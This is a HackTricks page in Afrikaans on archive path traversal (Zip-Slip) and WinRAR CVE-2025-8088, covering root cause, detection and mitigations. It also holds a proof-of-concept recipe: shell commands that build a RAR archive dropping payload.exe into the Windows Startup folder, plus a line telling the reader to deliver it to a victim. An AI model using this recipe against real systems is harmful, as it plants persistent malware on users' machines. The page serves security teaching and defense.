Argief Uittrekking Pad Traversal ("Zip-Slip" / WinRAR CVE-2025-8088)
Reading time: 5 minutes
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Oorsig
Baie argief formate (ZIP, RAR, TAR, 7-ZIP, ens.) laat elke inskrywing toe om sy eie interne pad te dra. Wanneer 'n uittrekking hulpmiddel blindelings daardie pad eerbiedig, sal 'n vervaardigde lĂȘernaam wat ..
of 'n absolute pad (bv. C:\Windows\System32\
) bevat, buite die gebruiker-gekose gids geskryf word. Hierdie klas kwesbaarheid is algemeen bekend as Zip-Slip of argief uittrekking pad traversie.
Gevolge wissel van die oorskryding van arbitrĂȘre lĂȘers tot die direkte bereiking van afgeleĂ« kode uitvoering (RCE) deur 'n payload in 'n auto-run ligging soos die Windows Startup gids te laat val.
Wortel Oorsaak
- Aanvaller skep 'n argief waar een of meer lĂȘer koppe bevat:
- Relatiewe traversie volgordes (
..\..\..\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe
) - Absolute pades (
C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\payload.exe
)
- Slachtoffer trek die argief uit met 'n kwesbare hulpmiddel wat die ingebedde pad vertrou in plaas daarvan om dit te saniteer of om uittrekking onder die gekose gids af te dwing.
- Die lĂȘer word in die aanvaller-beheerde ligging geskryf en uitgevoer/gelai die volgende keer wanneer die stelsel of gebruiker daardie pad aktiveer.
Regte-WĂȘreld Voorbeeld â WinRAR †7.12 (CVE-2025-8088)
WinRAR vir Windows (insluitend die rar
/ unrar
CLI, die DLL en die draagbare bron) het gefaal om lĂȘernames tydens uittrekking te valideer. 'n Kwaadwillige RAR argief wat 'n inskrywing soos bevat:
..\..\..\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
sal eindig buite die geselekte uitvoer gids en binne die gebruiker se Startup gids. Na aanmelding voer Windows outomaties alles wat daar teenwoordig is uit, wat volhoubare RCE bied.
Skep 'n PoC Argief (Linux/Mac)
# Requires rar >= 6.x
mkdir -p "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
cp payload.exe "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"
rar a -ep evil.rar evil/*
Options used:
-ep
â stoor lĂȘerpaaie presies soos gegee (moet nie leiende./
snoei nie).
Lewer evil.rar
aan die slagoffer en instrueer hulle om dit met 'n kwesbare WinRAR-bou te onttrek.
Geobserveerde Exploitatie in die Wild
ESET het RomCom (Storm-0978/UNC2596) spear-phishing veldtogte gerapporteer wat RAR-argiewe aangeheg het wat CVE-2025-8088 misbruik om pasgemaakte agterdeure te ontplooi en ransomware-operasies te fasiliteer.
Opsporingwenke
- Statiese inspeksie â Lys argiefinskrywings en merk enige naam wat
../
,..\\
, absolute paaie (C:
) of nie-kanonical UTF-8/UTF-16 kodering bevat. - Sandbox onttrekking â Decomprimeer in 'n weggooibare gids met 'n veilige onttrekker (bv. Python se
patool
, 7-Zip â„ nuutste,bsdtar
) en verifieer dat die resulterende paaie binne die gids bly. - Eindpuntmonitering â Laat weet oor nuwe uitvoerbare lĂȘers wat kort na 'n argief deur WinRAR/7-Zip/etc. geopen word, in
Startup
/Run
plekke geskryf word.
Versagting & Versterking
- Werk die onttrekker op â WinRAR 7.13 implementeer behoorlike pad-sanitizering. Gebruikers moet dit handmatig aflaai omdat WinRAR 'n outo-opdateringsmeganisme ontbreek.
- Onttrek argiewe met die âIgnore pathsâ opsie (WinRAR: Extract â "Do not extract paths") wanneer moontlik.
- Open onbetroubare argiewe binne 'n sandbox of VM.
- Implementeer toepassingswitlyste en beperk gebruikers se skrywe toegang tot outo-loop gidses.
Addisionele Aangetaste / Historiese Gevalle
- 2018 â Massiewe Zip-Slip advies deur Snyk wat baie Java/Go/JS biblioteke beĂŻnvloed.
- 2023 â 7-Zip CVE-2023-4011 soortgelyke traversering tydens
-ao
samesmelting. - Enige pasgemaakte onttrekkingslogika wat versuim om
PathCanonicalize
/realpath
voor skryf aan te roep.
Verwysings
- BleepingComputer â WinRAR zero-day exploited to plant malware on archive extraction
- WinRAR 7.13 Changelog
- Snyk â Zip Slip vulnerability write-up
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.